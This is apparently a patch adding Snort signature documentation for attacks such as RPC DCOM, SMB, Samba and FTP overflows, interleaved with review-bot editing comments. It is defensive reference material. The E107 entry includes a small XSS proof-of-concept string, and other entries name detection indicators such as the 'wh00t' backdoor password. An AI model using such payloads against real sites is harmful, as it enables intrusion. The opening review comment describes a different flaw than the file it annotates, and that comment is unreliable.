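Review bot: The Impact section is the remote-file-include boilerplate ("Possible execution of arbitrary code of the attackers choosing in some cases."), but the Summary describes a cross site scripting flaw in the "sort" parameter, whose consequence is script running in a victim's browser and theft of that user's information, which is what the Attack Scenarios paragraph itself says; rewrite Impact to match the flaw. Also "attackers choosing" needs the apostrophe ("attacker's"), and the "--" separators after "All systems running CGI applications using GL-SH Deaf Forum" and after the Contributors list lack the blank line used elsewhere in the file.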
--- /dev/null
+++ b/doc/signatures/2303.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2303
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
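Review bot: Attack Scenarios ("An attacker can access an authentication mechanism and supply his/her own credentials to gain access.") is the generic CGI template and does not describe the flaw given in Detailed Information, which is PHP code execution, file inclusion and retrieval of sensitive files through unchecked user input; rewrite the scenario around that. The Detailed Information sentence "This application does not perform stringent checks when handling user input, this may lead to the attacker being able to..." is a comma splice; split it into two sentences. Additional References is empty; add the advisory for Advanced Poll 2.0.2.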
--- /dev/null
+++ b/doc/signatures/3229.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3229
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
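Review bot: Same text as 3342.txt and 3316.txt; nothing here identifies what sid 3229 matches that the other RPC DCOM rules do not, so an analyst reading the alert cannot tell the four apart from their documentation. Add the distinguishing interface or request to Detailed Information. Typo under Ease of Attack: "Expoit" should read "Exploit".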
--- /dev/null
+++ b/doc/signatures/1328.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+1328
+
+--
+Summary:
+Attempted ps command access via web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the processes being run on a
+webserver. The ps command lists the process status of running processes
+on a UNIX or Linux based system. The attacker could possibly gain
+information needed for other attacks on the system.
+
+Using "ps", the attackers would check for various running system
+services to exploit or for the presence of security software, such as
+host IDS or monitoring scripts. This rule looks for the "ps" command in
+the URI part of the client to web server connection and does not
+indicate whether the command was actually successful in displaying the
+list of processes. The presence of the "ps" command in the URI indicates
+that an attacker attempted to trick the web server into executing system
+commands in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling
+connection to the server or a shell connection via another exploit
+against the web server.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/ps'in
+the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. This command may also be
+requested on a command line should the attacker gain access to the
+machine. On BSD derived systems, setting the parameter
+"kern.ps_showallprocs" to zero will show only the processes being run by
+that user except for root who will still see all processes.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+sid: 1329
+
+Manual page for ps.
+
+http://linux.about.com/library/cmd/blcmdl1_ps.htm
+
+--
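Review bot: The Affected Systems section present in every other file is missing here; add it (UNIX and Linux web servers, per the Detailed Information). Under Corrective Action, "outside of it's designated web root" should be "its", and under Attack Scenarios "'/bin/ps'in" lacks a space before "in". The "--" before "Additional References:" carries a trailing space; make it a bare "--" so tooling that splits on the separator matches it.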
--- /dev/null
+++ b/doc/signatures/2305.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2305
+
+--
+Summary:
+This event is generated when an attempt is made to access the script
+chatbox.php on a web server running a PHP application.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the script
+chatbox.php on a web server. This application does not perform stringent 
+checks when validating data supplied by the user in the Name field of
+the script. HTML or script code supplied via that field may cause a
+Denial of Service condition to occur.
+
+--
+Affected Systems:
+	All systems running E107 versions 0.545 and 0.603, other versions may
+	also be affected
+
+--
+Attack Scenarios:
+The attacker could supply some offending HTML code into the name field
+and cause the DoS.
+
+--
+Ease of Attack:
+Simple.
+
+Proof of concept exists, in the name field enter:
+
+<script type=javascript>alert('foo')</script>
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
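Review bot: The Summary says only "a web server running a PHP application"; name E107, which Affected Systems identifies, so the rule's scope is clear from the first line. Affected Systems wraps its single entry ("All systems running E107 versions 0.545 and 0.603, other versions may / also be affected") onto two tab-indented lines; keep one entry per line as the other files do. The proof-of-concept string sits under Ease of Attack, where the other files put a one-word rating; if it is kept, Attack Scenarios is the section for it, and Impact should say what the injected HTML does to the application rather than only "Denial of Service (DoS)."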
--- /dev/null
+++ b/doc/signatures/3144.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3144
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
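Review bot: Corrective Action advises "Turn off windows file and print services." and "Use Samba as an alternative.", but Detailed Information says the flaw is triggered by "a malicious response from a server in response to a client request using SMB", i.e. it is the SMB client that is exposed, so disabling the target's server-side services or substituting Samba as a server does not remove that exposure; drop or reword those two items and keep the vendor patch as the fix. Minor: "client - server" should be "client-server", and "windows" should be capitalised.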
--- /dev/null
+++ b/doc/signatures/546.txt
@@ -0,0 +1,56 @@
+Rule: 
+
+--
+Sid: 
+546
+
+--
+Summary: 
+This event is generated when an attempt is made to navigate in an FTP session to a hidden directory name that begins with a space.
+
+--
+Impact: 
+Unauthorized file storage.  An attacker may attempt to navigate on an FTP server to a directory name that begins with a space to list or store unauthorized files such as unlicensed software.
+
+--
+Detailed Information: 
+An attacker may attempt to hide unauthorized files in a hidden directory name that begins with a space.   This hidden directory is hard to discover, permitting attackers to store unauthorized "warez" files, such as unlicensed or pirated software.
+
+--
+Affected Systems: 
+FTP servers
+
+--
+Attack Scenarios: 
+An attacker may navigate to the hidden directory name that begins with a space to list or store unauthorized files.
+
+--
+Ease of Attack: 
+Simple
+
+--
+False Positives: 
+It is remotely possible that an authorized directory exists with a name that begins with a space.
+
+--
+False Negatives: 
+Hidden directories other than those with names that begin with a space may be used to store "warez" files.
+
+--
+Corrective Action: 
+Assign restrictive permissions to all directories so unauthorized users cannot navigate or write to them.
+
+Regularly monitor directories for sudden or drastic increased use of space.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/432.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+432
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Type 40 Code 3 Decryption Failed datagram.
+
+--
+
+Impact:
+ICMP Type 40 Code 3 datagrams are an indication that a received datagram failed a decryption check for a given SPI.  Normally this is an indication that hosts using IP Security Protocols such as AH or ESP have been configured incorrectly or are failing to establish a session with another host.
+
+--
+
+Detailed Information:
+Hosts using IP Security Protocols such as AH or ESP generate ICMP Type 40 datagrams when a failure condition occurs.  ICMP Type 40 Code 3 datagrams are generated when a received datagram fails the decryption check for a given SPI (Security Parameters Index). 
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 40 datagrams not normally seen on the network.  Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams.  Hosts generating these types of ICMP datagrams should be investigated for nefarious activity or configuration errors. 
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC2521
+
+
+--
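Review bot: Summary has "generates and ICMP Type 40 Code 3" for "an", and Corrective Action's "ICMP Type 40 datagrams not normally seen on the network." is missing "are". The Affected Systems section that every other file carries is absent. This file also puts a blank line after each "--" where the others do not; align it with the rest. "RFC2521" under Additional References is a bare identifier; give it as a URL like the other files do.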
--- /dev/null
+++ b/doc/signatures/2534.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2534
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
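Review bot: Typo under Attack Scenarios: "An attcker needs" should read "attacker". Affected Systems gives "Microsoft Windows 2000, 2003 and XP systems using SSL" as a single tab-indented line, while the other files list one system per line. Additional References is empty although the Summary calls this a known vulnerability; add the vendor bulletin.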
--- /dev/null
+++ b/doc/signatures/3316.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3316
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
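Review bot: Third copy of the 3342.txt text (see also 3229.txt), with the same "Expoit" typo under Ease of Attack. Add what sid 3316 matches on; otherwise the four RPC DCOM files cannot be told apart by their documentation.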
--- /dev/null
+++ b/doc/signatures/3034.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3034
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
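Review bot: "heterogenous" should be "heterogeneous", and "remote server.The problem" is missing a space after the full stop. Affected Systems gives "Samba 3.0.8 and prior" with nothing to back it, and Additional References is empty; add the Samba advisory the rule was written against. Ease of Attack is "Difficult." with no reason given; a short clause tying it to the integer overflow in ACL memory allocation that Attack Scenarios describes would help analysts triage.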
--- /dev/null
+++ b/doc/signatures/1919.txt
@@ -0,0 +1,59 @@
+Rule:
+--
+Sid:
+1919
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow or denial of service vulnerability associated with FTP CWD command. 
+
+--
+Impact:
+Remote access or denial of service.  A successful attack can cause a denial of service or allow remote execution of arbitrary commands with privileges of the process running the FTP server. 
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit various vulnerabilities associated with the FTP CWD command of different FTP servers. It is possible to cause a denial of service attack or gain remote access to execute arbitrary commands with the privileges of the process running the FTP server by sending an overly long argument with the FTP CWD command. 
+
+--
+Affected Systems:
+Hosts running BlackMoon FTP Server 1.0 through 1.5. 
+Hosts running Argosoft FRP server 1.0.
+Hosts running TYPSoft FTP Server 0.7x. 
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the CWD command, causing a denial of service or buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0126
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1194
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1035
+
+--
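Review bot: "Argosoft FRP server 1.0" under Affected Systems should read "FTP". The file lacks the blank line between "Rule:" and the first "--" that the other files have. Corrective Action says "Upgrade to the latest non-affected version of the software." without naming one; since the three CVE references cover three different products, a per-product fixed version, or at least a vendor link for each, would be more actionable.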
--- /dev/null
+++ b/doc/signatures/386.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+386
+
+--
+Summary:
+This event is generated when an internal server replies to an external request for network subnet mask information, which may allow an attacker to learn information about the network for use in later attacks. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+If an attacker sends an ICMP request to an internal server for address mask information (SID 388 should trigger when this activity is seen), an internal server may reply with subnet mask information.  This can provide an attacker with information about subnet mask configuration that can be useful for future attacks.
+
+--
+Affected Systems:
+Any system that responds to ICMP address mask requests.
+
+--
+Attack Scenarios:
+An attacker can send an ICMP request for subnet mask information to the internal network. The server replies, providing the attacker with information about network subnet configuration.
+
+--
+Ease of Attack:
+Simple. Tools that use this method of information gathering are freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a packet filtering firewall that restricts ICMP type 17 (address mask requests) from entering the protected network, and restricts ICMP type 18 packets (address mask replies) from exiting the protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski <matt.watchinski@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0524
+
+ArachNIDS
+http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids216
+
+--
--- /dev/null
+++ b/doc/signatures/100000168.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000168
+
+-- 
+Summary: 
+The password-cracking tool Hydra has been detected in HTTP traffic.
+
+--
+Impact:
+An attacker may be attempting to break into one or more web servers monitored 
+by Snort via a brute-force password attack. If successful, the attacker may 
+gain unauthorized access to internal networks.
+
+--
+Detailed Information:
+Hydra is a password-cracking tool released by a group of security experts 
+called THC, "The Hacker's Choice." Requests sent by this tool to a web server 
+contain the User-Agent string "Mozilla/4.0 (Hydra)". Since normal browsers' 
+User-Agent strings do not contain the string "(Hydra)", the presence of this 
+string indicates that the Hydra tool is likely being used.
+
+--
+Affected Systems:
+Any system running a web server.
+
+--
+Attack Scenarios:
+Attackers will use the Hydra password-cracking tool.
+
+--
+Ease of Attack:
+Simple, as the program is publicly available and is well-documented.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check system logs and Snort alert logs for suspicious activity, particularly 
+unusual logons. Ensure that secure passwords are being used throughout your 
+network.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+
+--
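Review bot: "Additional References" lacks its colon and the section is empty; link the THC Hydra project page that Detailed Information refers to. False Negatives "None known." overstates coverage: the rule keys only on the User-Agent string "Mozilla/4.0 (Hydra)", so requests from the tool without that default string are not detected; say so, and point analysts to the review of unusual logons that Corrective Action already recommends as the complementary check.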
--- /dev/null
+++ b/doc/signatures/100000146.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000146
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
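Review bot: Summary ends in "Imail Web Calendaring servicel", a typo for "service" with the full stop missing. Attack Scenarios: "An attacker send a URI" should be "sends". "Additional References" lacks its colon, and "Other:" is followed by nothing; add the advisory or remove the empty label. Affected Systems lists "8.2 and prior" and "8.15 and prior" as separate entries; if these are the same version line the first subsumes the second, so clarify whether they are distinct product branches.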
--- /dev/null
+++ b/doc/signatures/355.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+355
+
+--
+Summary:
+This event is generated when a password of "wh00t" is used to login to an File Transfer Protocol (FTP) server.
+
+--
+Impact:
+Remote root access.  The attack may indicate that the FTP server has been compromised. 
+
+--
+Detailed Information:
+The password "wh00t" is a common backdoor password associated with a compromised root account.  If this password is observed, it may indicate that the FTP server has been compromised and a backdoor root account with a password of "wh00t" has been created.  Alternately, this may indicate a failed attempt of an attacker attempting to locate FTP servers compromised by others. 
+
+--
+Affected Systems:
+FTP servers.
+
+--
+Attack Scenarios:
+An attacker may compromise a host and create a backdoor account.  An attacker may attempt to locate FTP servers with a backdoor account.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+It is very remotely possible that a legitimate password of "wh00t" exists.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Examine the suspected compromised host for unauthorized changes.
+
+Make sure that the suspected compromised host has all security patches applied.
+
+Log activity to and from the suspected compromised host.
+
+Examine other systems on the network for evidence of compromise.
+
+If a compromised is discovered, reinstall the operating system.
+
+--
+Contributors:
+Orignal rule written by Ron Gula <rgula@tenablesecurity.com>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS324
+
+--
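Review bot: "If a compromised is discovered, reinstall the operating system." in Corrective Action should read "If a compromise is discovered". In the same file, "Orignal rule written by" in Contributors is a typo for "Original", "an File Transfer Protocol (FTP) server" in the Summary should be "a File Transfer Protocol (FTP) server", and "Steven Alexander<alexander.s@mccd.edu>" is missing the space before the address.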
--- /dev/null
+++ b/doc/signatures/100000550.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+100000550
+--
+Summary:
+This event is generated when an attempt is made to access the file "comment.php 
+which contains known vulnerabilities in the "Project Eros BBSEngine" 
+application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a file with known 
+vulnerabilities from a remote machine used by the "Project Eros BBSEngine" 
+application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Project Eros BBSEngine
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
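Review bot: the Summary opens a quote on "comment.php that is never closed; it should read "comment.php" which contains. Further down, "running ona web server" in Detailed Information should be "on a web server", "attackers choosing" (twice) wants the possessive "attacker's", and the Affected Systems line has no blank line before its "--" separator, unlike every other section in the file.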
--- /dev/null
+++ b/doc/signatures/3428.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3428
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
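Review bot: the Attack Scenarios text ("An attacker may make a request for a file with an overly long filename via a network share.") describes a file-share overflow, not the malformed RPC DCOM request that Detailed Information describes; the scenario should match the vulnerability documented, i.e. a malformed request to an RPC port. Also "Expoit code exists." in Ease of Attack is a typo for "Exploit".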
--- /dev/null
+++ b/doc/signatures/1571.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1571
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
